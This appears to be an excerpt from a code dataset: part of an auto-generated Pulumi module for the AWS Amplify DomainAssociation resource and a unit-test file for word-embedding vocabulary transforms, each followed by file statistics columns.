:param pulumi.Input[bool] wait_for_verification: If enabled, the resource will wait for the domain association status to change to `PENDING_DEPLOYMENT` or `AVAILABLE`. Setting this to `false` will skip the process. Default: `true`.
"""
if app_id is not None:
pulumi.set(__self__, "app_id", app_id)
if arn is not None:
pulumi.set(__self__, "arn", arn)
if certificate_verification_dns_record is not None:
pulumi.set(__self__, "certificate_verification_dns_record", certificate_verification_dns_record)
if domain_name is not None:
pulumi.set(__self__, "domain_name", domain_name)
if sub_domains is not None:
pulumi.set(__self__, "sub_domains", sub_domains)
if wait_for_verification is not None:
pulumi.set(__self__, "wait_for_verification", wait_for_verification)
@property
@pulumi.getter(name="appId")
def app_id(self) -> Optional[pulumi.Input[str]]:
"""
The unique ID for an Amplify app.
"""
return pulumi.get(self, "app_id")
@app_id.setter
def app_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "app_id", value)
@property
@pulumi.getter
def arn(self) -> Optional[pulumi.Input[str]]:
"""
The Amazon Resource Name (ARN) for the domain association.
"""
return pulumi.get(self, "arn")
@arn.setter
def arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "arn", value)
@property
@pulumi.getter(name="certificateVerificationDnsRecord")
def certificate_verification_dns_record(self) -> Optional[pulumi.Input[str]]:
"""
The DNS record for certificate verification.
"""
return pulumi.get(self, "certificate_verification_dns_record")
@certificate_verification_dns_record.setter
def certificate_verification_dns_record(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "certificate_verification_dns_record", value)
@property
@pulumi.getter(name="domainName")
def domain_name(self) -> Optional[pulumi.Input[str]]:
"""
The domain name for the domain association.
"""
return pulumi.get(self, "domain_name")
@domain_name.setter
def domain_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "domain_name", value)
@property
@pulumi.getter(name="subDomains")
def sub_domains(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['DomainAssociationSubDomainArgs']]]]:
"""
The setting for the subdomain. Documented below.
"""
return pulumi.get(self, "sub_domains")
@sub_domains.setter
def sub_domains(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['DomainAssociationSubDomainArgs']]]]):
pulumi.set(self, "sub_domains", value)
@property
@pulumi.getter(name="waitForVerification")
def wait_for_verification(self) -> Optional[pulumi.Input[bool]]:
"""
If enabled, the resource will wait for the domain association status to change to `PENDING_DEPLOYMENT` or `AVAILABLE`. Setting this to `false` will skip the process. Default: `true`.
"""
return pulumi.get(self, "wait_for_verification")
@wait_for_verification.setter
def wait_for_verification(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "wait_for_verification", value)
class DomainAssociation(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
app_id: Optional[pulumi.Input[str]] = None,
domain_name: Optional[pulumi.Input[str]] = None,
sub_domains: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DomainAssociationSubDomainArgs']]]]] = None,
wait_for_verification: Optional[pulumi.Input[bool]] = None,
__props__=None):
"""
Provides an Amplify Domain Association resource.
## Example Usage
```python
import pulumi
import pulumi_aws as aws
example_app = aws.amplify.App("exampleApp", custom_rules=[aws.amplify.AppCustomRuleArgs(
source="https://example.com",
status="302",
target="https://www.example.com",
)])
master = aws.amplify.Branch("master",
app_id=example_app.id,
branch_name="master")
example_domain_association = aws.amplify.DomainAssociation("exampleDomainAssociation",
app_id=example_app.id,
domain_name="example.com",
sub_domains=[
aws.amplify.DomainAssociationSubDomainArgs(
branch_name=master.branch_name,
prefix="",
),
aws.amplify.DomainAssociationSubDomainArgs(
branch_name=master.branch_name,
prefix="www",
),
])
```
## Import
Amplify domain association can be imported using `app_id` and `domain_name`, e.g.,
```sh
$ pulumi import aws:amplify/domainAssociation:DomainAssociation app d2ypk4k47z8u6/example.com
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] app_id: The unique ID for an Amplify app.
:param pulumi.Input[str] domain_name: The domain name for the domain association.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DomainAssociationSubDomainArgs']]]] sub_domains: The setting for the subdomain. Documented below.
:param pulumi.Input[bool] wait_for_verification: If enabled, the resource will wait for the domain association status to change to `PENDING_DEPLOYMENT` or `AVAILABLE`. Setting this to `false` will skip the process. Default: `true`.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: DomainAssociationArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides an Amplify Domain Association resource.
## Example Usage
```python
import pulumi
import pulumi_aws as aws
example_app = aws.amplify.App("exampleApp", custom_rules=[aws.amplify.AppCustomRuleArgs(
source="https://example.com",
status="302",
target="https://www.example.com",
)])
master = aws.amplify.Branch("master",
app_id=example_app.id,
branch_name="master")
example_domain_association = aws.amplify.DomainAssociation("exampleDomainAssociation",
app_id=example_app.id,
domain_name="example.com",
sub_domains=[
aws.amplify.DomainAssociationSubDomainArgs(
branch_name=master.branch_name,
prefix="",
),
aws.amplify.DomainAssociationSubDomainArgs(
branch_name=master.branch_name,
prefix="www",
),
])
```
## Import
Amplify domain association can be imported using `app_id` and `domain_name`, e.g.,
```sh
$ pulumi import aws:amplify/domainAssociation:DomainAssociation app d2ypk4k47z8u6/example.com
```
:param str resource_name: The name of the resource.
:param DomainAssociationArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(DomainAssociationArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
app_id: Optional[pulumi.Input[str]] = None,
domain_name: Optional[pulumi.Input[str]] = None,
sub_domains: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DomainAssociationSubDomainArgs']]]]] = None,
wait_for_verification: Optional[pulumi.Input[bool]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = DomainAssociationArgs.__new__(DomainAssociationArgs)
if app_id is None and not opts.urn:
raise TypeError("Missing required property 'app_id'")
__props__.__dict__["app_id"] = app_id
if domain_name is None and not opts.urn:
raise TypeError("Missing required property 'domain_name'")
__props__.__dict__["domain_name"] = domain_name
if sub_domains is None and not opts.urn:
raise TypeError("Missing required property 'sub_domains'")
__props__.__dict__["sub_domains"] = sub_domains
__props__.__dict__["wait_for_verification"] = wait_for_verification
__props__.__dict__["arn"] = None
__props__.__dict__["certificate_verification_dns_record"] = None
super(DomainAssociation, __self__).__init__(
'aws:amplify/domainAssociation:DomainAssociation',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
app_id: Optional[pulumi.Input[str]] = None,
arn: Optional[pulumi.Input[str]] = None,
certificate_verification_dns_record: Optional[pulumi.Input[str]] = None,
domain_name: Optional[pulumi.Input[str]] = None,
sub_domains: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DomainAssociationSubDomainArgs']]]]] = None,
wait_for_verification: Optional[pulumi.Input[bool]] = None) -> 'DomainAssociation':
"""
Get an existing DomainAssociation resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] app_id: The unique ID for an Amplify app.
:param pulumi.Input[str] arn: The Amazon Resource Name (ARN) for the domain association.
:param pulumi.Input[str] certificate_verification_dns_record: The DNS record for certificate verification.
:param pulumi.Input[str] domain_name: The domain name for the domain association.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DomainAssociationSubDomainArgs']]]] sub_domains: The setting for the subdomain. Documented below.
:param pulumi.Input[bool] wait_for_verification: If enabled, the resource will wait for the domain association status to change to `PENDING_DEPLOYMENT` or `AVAILABLE`. Setting this to `false` will skip the process. Default: `true`.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _DomainAssociationState.__new__(_DomainAssociationState)
__props__.__dict__["app_id"] = app_id
__props__.__dict__["arn"] = arn
__props__.__dict__["certificate_verification_dns_record"] = certificate_verification_dns_record
__props__.__dict__["domain_name"] = domain_name
__props__.__dict__["sub_domains"] = sub_domains
__props__.__dict__["wait_for_verification"] = wait_for_verification
return DomainAssociation(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="appId")
def app_id(self) -> pulumi.Output[str]:
"""
The unique ID for an Amplify app.
"""
return pulumi.get(self, "app_id")
@property
@pulumi.getter
def arn(self) -> pulumi.Output[str]:
"""
The Amazon Resource Name (ARN) for the domain association.
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter(name="certificateVerificationDnsRecord")
def certificate_verification_dns_record(self) -> pulumi.Output[str]:
"""
The DNS record for certificate verification.
"""
return pulumi.get(self, "certificate_verification_dns_record")
@property
@pulumi.getter(name="domainName")
def domain_name(self) -> pulumi.Output[str]:
"""
The domain name for the domain association.
"""
return pulumi.get(self, "domain_name")
@property
@pulumi.getter(name="subDomains")
def sub_domains(self) -> pulumi.Output[Sequence['outputs.DomainAssociationSubDomain']]:
"""
The setting for the subdomain. Documented below.
"""
return pulumi.get(self, "sub_domains")
@property
@pulumi.getter(name="waitForVerification")
def wait_for_verification(self) -> pulumi.Output[Optional[bool]]:
"""
If enabled, the resource will wait for the domain association status to change to `PENDING_DEPLOYMENT` or `AVAILABLE`. Setting this to `false` will skip the process. Default: `true`.
"""
return pulumi.get(self, "wait_for_verification")
| 44.504717
| 239
| 0.654531
| 2,111
| 18,870
| 5.597821
| 0.090005
| 0.0754
| 0.047389
| 0.037234
| 0.835407
| 0.81552
| 0.784125
| 0.76483
| 0.745621
| 0.728357
| 0
| 0.001334
| 0.245257
| 18,870
| 423
| 240
| 44.609929
| 0.828395
| 0.355432
| 0
| 0.580189
| 1
| 0
| 0.140665
| 0.07627
| 0
| 0
| 0
| 0
| 0
| 1
| 0.15566
| false
| 0.004717
| 0.033019
| 0
| 0.283019
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8e73086192b5cd9bb7f5688d015f2519a8fc4641
| 17,550
|
py
|
Python
|
web/tests/test_transform_words.py
|
zeyuyun1/word-embeddings-benchmarks
|
3586675b8fc5c83c615d8227e6a2eacab59a7b4f
|
[
"MIT"
] | 416
|
2015-12-28T18:09:22.000Z
|
2022-03-22T07:46:35.000Z
|
web/tests/test_transform_words.py
|
zeyuyun1/word-embeddings-benchmarks
|
3586675b8fc5c83c615d8227e6a2eacab59a7b4f
|
[
"MIT"
] | 55
|
2016-04-07T07:23:57.000Z
|
2021-01-04T14:09:03.000Z
|
web/tests/test_transform_words.py
|
zeyuyun1/word-embeddings-benchmarks
|
3586675b8fc5c83c615d8227e6a2eacab59a7b4f
|
[
"MIT"
] | 120
|
2016-04-14T00:42:28.000Z
|
2022-03-17T14:19:21.000Z
|
from web.embedding import Embedding
from web.vocabulary import *
import numpy as np
import logging
import sys
# COUNTEDVOCABULARY
def test_noinplace_transform_word_CountedVocabulary():
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
cw = CountedVocabulary(word_count=[(' cat ', 10), ('cat', 50), ('dog', 60)])
e = Embedding(vocabulary=cw, vectors=np.asanyarray([[0, 0, 11], [0, 11, 12], [0, 12, 13]]))
pe = e.transform_words(lambda x: x.strip(), inplace=False)
assert len(pe.vocabulary) == 2
assert len(pe.vectors) == 2
# 'dog'
assert [0, 0, 11] in pe.vectors.tolist()
# 'cat'
assert [0, 11, 12] in pe.vectors.tolist()
assert 'cat' in pe.vocabulary.words
assert 'dog' in pe.vocabulary.words
l = pe.vocabulary.getstate()
d = {l[0][i]: l[1][i] for i in range(len(l[0]))}
# dog
assert pe.vocabulary.words[0] == 'dog'
assert np.array_equal(pe.vectors[0], [0, 0, 11])
assert d['dog'] == 60
# cat
assert pe.vocabulary.words[1] == 'cat'
assert np.array_equal(pe.vectors[1], [0, 11, 12])
assert d['cat'] == 50
assert type(pe.vocabulary) == CountedVocabulary
def test_noinplace_transform_word_prefer_occurences_CountedVocabulary():
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
cw = CountedVocabulary(word_count=[(' cat ', 5), ('pikatchu ', 10), ('cat', 50), ('dog', 60), ('pikatchu', 200)])
e = Embedding(vocabulary=cw, vectors=np.asanyarray([[0, 0, 1], [0, 1, 11], [0, 11, 12], [0, 12, 13], [0, 13, 14]]))
pe = e.transform_words(lambda x: x.strip(), inplace=False)
assert len(pe.vocabulary) == 3
assert len(pe.vectors) == 3
l = pe.vocabulary.getstate()
d = {l[0][i]: l[1][i] for i in range(len(l[0]))}
# 'dog'
assert [0, 1, 11] in pe.vectors.tolist()
# 'cat'
assert [0, 11, 12] in pe.vectors.tolist()
# pikatchu
assert [0, 0, 1] in pe.vectors.tolist()
assert 'cat' in pe.vocabulary.words
assert 'dog' in pe.vocabulary.words
assert 'pikatchu' in pe.vocabulary.words
# pikatchu
assert pe.vocabulary.words[0] == 'pikatchu'
assert np.array_equal(pe.vectors[0], [0, 0, 1])
assert d['pikatchu'] == 200
# dog
assert pe.vocabulary.words[1] == 'dog'
assert np.array_equal(pe.vectors[1], [0, 1, 11])
assert d['dog'] == 60
# cat
assert pe.vocabulary.words[2] == 'cat'
assert np.array_equal(pe.vectors[2], [0, 11, 12])
assert d['cat'] == 50
assert type(pe.vocabulary) == CountedVocabulary
def test_noinplace_transform_word_prefer_shortestword_CountedVocabulary():
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
cw = CountedVocabulary(
word_count=[('dog', 60), ('cat', 50), (' pikatchu ', 10), ('pikatchu', 10), (' cat ', 5)])
e = Embedding(vocabulary=cw, vectors=np.asanyarray([[0, 0, 1], [0, 1, 11], [0, 11, 12], [0, 12, 13], [0, 13, 14]]))
pe = e.transform_words(lambda x: x.strip(), inplace=False)
assert len(pe.vocabulary) == 3
assert len(pe.vectors) == 3
# 'dog'
assert [0, 0, 1] in pe.vectors.tolist()
# 'cat'
assert [0, 1, 11] in pe.vectors.tolist()
# pikatchu
assert [0, 12, 13] in pe.vectors.tolist()
assert 'cat' in pe.vocabulary.words
assert 'dog' in pe.vocabulary.words
assert 'pikatchu' in pe.vocabulary.words
l = pe.vocabulary.getstate()
d = {l[0][i]: l[1][i] for i in range(len(l[0]))}
# pikatchu
assert pe.vocabulary.words[2] == 'pikatchu'
assert np.array_equal(pe.vectors[2], [0, 12, 13])
assert d['pikatchu'] == 10
# dog
assert pe.vocabulary.words[0] == 'dog'
assert np.array_equal(pe.vectors[0], [0, 0, 1])
assert d['dog'] == 60
# cat
assert pe.vocabulary.words[1] == 'cat'
assert np.array_equal(pe.vectors[1], [0, 1, 11])
assert d['cat'] == 50
assert type(pe.vocabulary) == CountedVocabulary
# ORDERDVOCABULARY
def test_noinplace_transform_word_OrderedVocabulary():
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
cw = OrderedVocabulary(words=['dog', 'cat', ' cat'])
e = Embedding(vocabulary=cw, vectors=np.asanyarray([[0, 0, 11], [0, 11, 12], [0, 12, 13]]))
pe = e.transform_words(lambda x: x.strip(), inplace=False)
assert len(pe.vocabulary) == 2
assert len(pe.vectors) == 2
# 'dog'
assert [0, 0, 11] in pe.vectors.tolist()
# 'cat'
assert [0, 11, 12] in pe.vectors.tolist()
assert 'cat' in pe.vocabulary.words
assert 'dog' in pe.vocabulary.words
# dog
assert pe.vocabulary.words[0] == 'dog'
assert np.array_equal(pe.vectors[0], [0, 0, 11])
# cat
assert pe.vocabulary.words[1] == 'cat'
assert np.array_equal(pe.vectors[1], [0, 11, 12])
assert type(pe.vocabulary) == OrderedVocabulary
def test_noinplace_transform_word_prefer_occurences_OrderedVocabulary():
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
cw = OrderedVocabulary(words=['pikatchu', 'dog', 'cat', 'pikatchu ', ' cat '])
e = Embedding(vocabulary=cw, vectors=np.asanyarray([[0, 0, 1], [0, 1, 11], [0, 11, 12], [0, 12, 13], [0, 13, 14]]))
pe = e.transform_words(lambda x: x.strip(), inplace=False)
assert len(pe.vocabulary) == 3
assert len(pe.vectors) == 3
# 'dog'
assert [0, 1, 11] in pe.vectors.tolist()
# 'cat'
assert [0, 11, 12] in pe.vectors.tolist()
# pikatchu
assert [0, 0, 1] in pe.vectors.tolist()
assert 'cat' in pe.vocabulary.words
assert 'dog' in pe.vocabulary.words
assert 'pikatchu' in pe.vocabulary.words
# pikatchu
assert pe.vocabulary.words[0] == 'pikatchu'
assert np.array_equal(pe.vectors[0], [0, 0, 1])
# dog
assert pe.vocabulary.words[1] == 'dog'
assert np.array_equal(pe.vectors[1], [0, 1, 11])
# cat
assert pe.vocabulary.words[2] == 'cat'
assert np.array_equal(pe.vectors[2], [0, 11, 12])
assert type(pe.vocabulary) == OrderedVocabulary
def test_noinplace_transform_word_prefer_shortestword_OrderedVocabulary():
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
cw = OrderedVocabulary(words=['dog', 'cat', ' pikatchu ', 'pikatchu', ' cat '])
e = Embedding(vocabulary=cw, vectors=np.asanyarray([[0, 0, 1], [0, 1, 11], [0, 11, 12], [0, 12, 13], [0, 13, 14]]))
pe = e.transform_words(lambda x: x.strip(), inplace=False)
assert len(pe.vocabulary) == 3
assert len(pe.vectors) == 3
# 'dog'
assert [0, 0, 1] in pe.vectors.tolist()
# 'cat'
assert [0, 1, 11] in pe.vectors.tolist()
# pikatchu
assert [0, 11, 12] in pe.vectors.tolist()
assert 'cat' in pe.vocabulary.words
assert 'dog' in pe.vocabulary.words
assert 'pikatchu' in pe.vocabulary.words
# pikatchu
assert pe.vocabulary.words[2] == 'pikatchu'
assert np.array_equal(pe.vectors[2], [0, 11, 12])
# dog
assert pe.vocabulary.words[0] == 'dog'
assert np.array_equal(pe.vectors[0], [0, 0, 1])
# cat
assert pe.vocabulary.words[1] == 'cat'
assert np.array_equal(pe.vectors[1], [0, 1, 11])
assert type(pe.vocabulary) == OrderedVocabulary
# VOCABULARY
def test_noinplace_transform_word_Vocabulary():
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
cw = Vocabulary(words=['dog', 'cat', ' cat '])
e = Embedding(vocabulary=cw, vectors=np.asanyarray([[0, 0, 11], [0, 11, 12], [0, 12, 13]]))
pe = e.transform_words(lambda x: x.strip(), inplace=False)
assert len(pe.vocabulary) == 2
assert len(pe.vectors) == 2
# 'dog'
assert [0, 0, 11] in pe.vectors.tolist()
# 'cat'
assert [0, 11, 12] in pe.vectors.tolist()
assert 'cat' in pe.vocabulary.words
assert 'dog' in pe.vocabulary.words
# dog
assert pe.vocabulary.words[0] == 'dog'
assert np.array_equal(pe.vectors[0], [0, 0, 11])
# cat
assert pe.vocabulary.words[1] == 'cat'
assert np.array_equal(pe.vectors[1], [0, 11, 12])
assert type(pe.vocabulary) == Vocabulary
def test_noinplace_transform_word_prefer_shortest_ord1_Vocabulary():
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
cw = Vocabulary(words=['pikatchu ', 'dog', 'cat', 'pikatchu', ' cat '])
e = Embedding(vocabulary=cw, vectors=np.asanyarray([[0, 12, 13], [0, 1, 11], [0, 11, 12], [0, 0, 1], [0, 13, 14]]))
pe = e.transform_words(lambda x: x.strip(), inplace=False)
assert len(pe.vocabulary) == 3
assert len(pe.vectors) == 3
# 'dog'
assert [0, 1, 11] in pe.vectors.tolist()
# 'cat'
assert [0, 11, 12] in pe.vectors.tolist()
# pikatchu
assert [0, 0, 1] in pe.vectors.tolist()
assert 'cat' in pe.vocabulary.words
assert 'dog' in pe.vocabulary.words
assert 'pikatchu' in pe.vocabulary.words
# pikatchu
assert pe.vocabulary.words[2] == 'pikatchu'
assert np.array_equal(pe.vectors[2], [0, 0, 1])
# dog
assert pe.vocabulary.words[0] == 'dog'
assert np.array_equal(pe.vectors[0], [0, 1, 11])
# cat
assert pe.vocabulary.words[1] == 'cat'
assert np.array_equal(pe.vectors[1], [0, 11, 12])
assert type(pe.vocabulary) == Vocabulary
def test_noinplace_transform_word_prefer_shortestword2_Vocabulary():
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
cw = Vocabulary(words=['dog', 'cat', ' pikatchu ', 'pikatchu', ' cat '])
e = Embedding(vocabulary=cw, vectors=np.asanyarray([[0, 0, 1], [0, 1, 11], [0, 11, 12], [0, 12, 13], [0, 13, 14]]))
pe = e.transform_words(lambda x: x.strip(), inplace=False)
assert len(pe.vocabulary) == 3
assert len(pe.vectors) == 3
# 'dog'
assert [0, 0, 1] in pe.vectors.tolist()
# 'cat'
assert [0, 1, 11] in pe.vectors.tolist()
# pikatchu
assert [0, 12, 13] in pe.vectors.tolist()
assert 'cat' in pe.vocabulary.words
assert 'dog' in pe.vocabulary.words
assert 'pikatchu' in pe.vocabulary.words
# pikatchu
assert pe.vocabulary.words[2] == 'pikatchu'
assert np.array_equal(pe.vectors[2], [0, 12, 13])
# dog
assert pe.vocabulary.words[0] == 'dog'
assert np.array_equal(pe.vectors[0], [0, 0, 1])
# cat
assert pe.vocabulary.words[1] == 'cat'
assert np.array_equal(pe.vectors[1], [0, 1, 11])
assert type(pe.vocabulary) == Vocabulary
####################### inplace= True #######################
# COUNTEDVOCABULARY
def test_inplace_transform_word_CountedVocabulary():
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
cw = CountedVocabulary(word_count=[(' cat ', 10), ('cat', 50), ('dog', 60)])
e = Embedding(vocabulary=cw, vectors=np.asanyarray([[0, 0, 11], [0, 11, 12], [0, 12, 13]]))
pe = e.transform_words(lambda x: x.strip(), inplace=True)
assert pe is e and pe == e
assert len(pe.vocabulary) == 2
assert len(pe.vectors) == 2
# 'dog'
assert [0, 0, 11] in pe.vectors.tolist()
# 'cat'
assert [0, 11, 12] in pe.vectors.tolist()
assert 'cat' in pe.vocabulary.words
assert 'dog' in pe.vocabulary.words
l = pe.vocabulary.getstate()
d = {l[0][i]: l[1][i] for i in range(len(l[0]))}
# dog
assert pe.vocabulary.words[0] == 'dog'
assert np.array_equal(pe.vectors[0], [0, 0, 11])
assert d['dog'] == 60
# cat
assert pe.vocabulary.words[1] == 'cat'
assert np.array_equal(pe.vectors[1], [0, 11, 12])
assert d['cat'] == 50
assert type(pe.vocabulary) == CountedVocabulary
def test_inplace_transform_word_prefer_occurences_CountedVocabulary():
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
cw = CountedVocabulary(word_count=[(' cat ', 5), ('pikatchu ', 10), ('cat', 50), ('dog', 60), ('pikatchu', 200)])
e = Embedding(vocabulary=cw, vectors=np.asanyarray([[0, 0, 1], [0, 1, 11], [0, 11, 12], [0, 12, 13], [0, 13, 14]]))
pe = e.transform_words(lambda x: x.strip(), inplace=True)
assert pe is e and pe == e
assert len(pe.vocabulary) == 3
assert len(pe.vectors) == 3
l = pe.vocabulary.getstate()
d = {l[0][i]: l[1][i] for i in range(len(l[0]))}
# 'dog'
assert [0, 1, 11] in pe.vectors.tolist()
# 'cat'
assert [0, 11, 12] in pe.vectors.tolist()
# pikatchu
assert [0, 0, 1] in pe.vectors.tolist()
assert 'cat' in pe.vocabulary.words
assert 'dog' in pe.vocabulary.words
assert 'pikatchu' in pe.vocabulary.words
# pikatchu
assert pe.vocabulary.words[0] == 'pikatchu'
assert np.array_equal(pe.vectors[0], [0, 0, 1])
assert d['pikatchu'] == 200
# dog
assert pe.vocabulary.words[1] == 'dog'
assert np.array_equal(pe.vectors[1], [0, 1, 11])
assert d['dog'] == 60
# cat
assert pe.vocabulary.words[2] == 'cat'
assert np.array_equal(pe.vectors[2], [0, 11, 12])
assert d['cat'] == 50
assert type(pe.vocabulary) == CountedVocabulary
def test_inplace_transform_word_prefer_shortestword_CountedVocabulary():
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
cw = CountedVocabulary(
word_count=[('dog', 60), ('cat', 50), (' pikatchu ', 10), ('pikatchu', 10), (' cat ', 5)])
e = Embedding(vocabulary=cw, vectors=np.asanyarray([[0, 0, 1], [0, 1, 11], [0, 11, 12], [0, 12, 13], [0, 13, 14]]))
pe = e.transform_words(lambda x: x.strip(), inplace=True)
assert pe is e and pe == e
assert len(pe.vocabulary) == 3
assert len(pe.vectors) == 3
# 'dog'
assert [0, 0, 1] in pe.vectors.tolist()
# 'cat'
assert [0, 1, 11] in pe.vectors.tolist()
# pikatchu
assert [0, 12, 13] in pe.vectors.tolist()
assert 'cat' in pe.vocabulary.words
assert 'dog' in pe.vocabulary.words
assert 'pikatchu' in pe.vocabulary.words
l = pe.vocabulary.getstate()
d = {l[0][i]: l[1][i] for i in range(len(l[0]))}
# pikatchu
assert pe.vocabulary.words[2] == 'pikatchu'
assert np.array_equal(pe.vectors[2], [0, 12, 13])
assert d['pikatchu'] == 10
# dog
assert pe.vocabulary.words[0] == 'dog'
assert np.array_equal(pe.vectors[0], [0, 0, 1])
assert d['dog'] == 60
# cat
assert pe.vocabulary.words[1] == 'cat'
assert np.array_equal(pe.vectors[1], [0, 1, 11])
assert d['cat'] == 50
assert type(pe.vocabulary) == CountedVocabulary
# ORDERDVOCABULARY
def test_inplace_transform_word_OrderedVocabulary():
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
cw = OrderedVocabulary(words=['dog', 'cat', ' cat'])
e = Embedding(vocabulary=cw, vectors=np.asanyarray([[0, 0, 11], [0, 11, 12], [0, 12, 13]]))
pe = e.transform_words(lambda x: x.strip(), inplace=True)
assert pe is e and pe == e
assert len(pe.vocabulary) == 2
assert len(pe.vectors) == 2
# 'dog'
assert [0, 0, 11] in pe.vectors.tolist()
# 'cat'
assert [0, 11, 12] in pe.vectors.tolist()
assert 'cat' in pe.vocabulary.words
assert 'dog' in pe.vocabulary.words
# dog
assert pe.vocabulary.words[0] == 'dog'
assert np.array_equal(pe.vectors[0], [0, 0, 11])
# cat
assert pe.vocabulary.words[1] == 'cat'
assert np.array_equal(pe.vectors[1], [0, 11, 12])
assert type(pe.vocabulary) == OrderedVocabulary
def test_inplace_transform_word_prefer_occurences_OrderedVocabulary():
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
cw = OrderedVocabulary(words=['pikatchu', 'dog', 'cat', 'pikatchu ', ' cat '])
e = Embedding(vocabulary=cw, vectors=np.asanyarray([[0, 0, 1], [0, 1, 11], [0, 11, 12], [0, 12, 13], [0, 13, 14]]))
pe = e.transform_words(lambda x: x.strip(), inplace=True)
assert pe is e and pe == e
assert len(pe.vocabulary) == 3
assert len(pe.vectors) == 3
# 'dog'
assert [0, 1, 11] in pe.vectors.tolist()
# 'cat'
assert [0, 11, 12] in pe.vectors.tolist()
# pikatchu
assert [0, 0, 1] in pe.vectors.tolist()
assert 'cat' in pe.vocabulary.words
assert 'dog' in pe.vocabulary.words
assert 'pikatchu' in pe.vocabulary.words
# pikatchu
assert pe.vocabulary.words[0] == 'pikatchu'
assert np.array_equal(pe.vectors[0], [0, 0, 1])
# dog
assert pe.vocabulary.words[1] == 'dog'
assert np.array_equal(pe.vectors[1], [0, 1, 11])
# cat
assert pe.vocabulary.words[2] == 'cat'
assert np.array_equal(pe.vectors[2], [0, 11, 12])
assert type(pe.vocabulary) == OrderedVocabulary
def test_inplace_transform_word_prefer_shortestword_OrderedVocabulary():
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
cw = OrderedVocabulary(words=['dog', 'cat', ' pikatchu ', 'pikatchu', ' cat '])
e = Embedding(vocabulary=cw, vectors=np.asanyarray([[0, 0, 1], [0, 1, 11], [0, 11, 12], [0, 12, 13], [0, 13, 14]]))
pe = e.transform_words(lambda x: x.strip(), inplace=True)
assert pe is e and pe == e
assert len(pe.vocabulary) == 3
assert len(pe.vectors) == 3
# 'dog'
assert [0, 0, 1] in pe.vectors.tolist()
# 'cat'
assert [0, 1, 11] in pe.vectors.tolist()
# pikatchu
assert [0, 11, 12] in pe.vectors.tolist()
assert 'cat' in pe.vocabulary.words
assert 'dog' in pe.vocabulary.words
assert 'pikatchu' in pe.vocabulary.words
# pikatchu
assert pe.vocabulary.words[2] == 'pikatchu'
assert np.array_equal(pe.vectors[2], [0, 11, 12])
# dog
assert pe.vocabulary.words[0] == 'dog'
assert np.array_equal(pe.vectors[0], [0, 0, 1])
# cat
assert pe.vocabulary.words[1] == 'cat'
assert np.array_equal(pe.vectors[1], [0, 1, 11])
assert type(pe.vocabulary) == OrderedVocabulary
| 30.20654
| 119
| 0.621425
| 2,566
| 17,550
| 4.194856
| 0.028449
| 0.12932
| 0.126347
| 0.063174
| 0.987644
| 0.985229
| 0.97566
| 0.974731
| 0.974452
| 0.974452
| 0
| 0.059785
| 0.205128
| 17,550
| 580
| 120
| 30.258621
| 0.711828
| 0.032764
| 0
| 0.919003
| 0
| 0
| 0.046137
| 0
| 0
| 0
| 0
| 0
| 0.707165
| 1
| 0.046729
| false
| 0
| 0.015576
| 0
| 0.062305
| 0
| 0
| 0
| 0
| null | 0
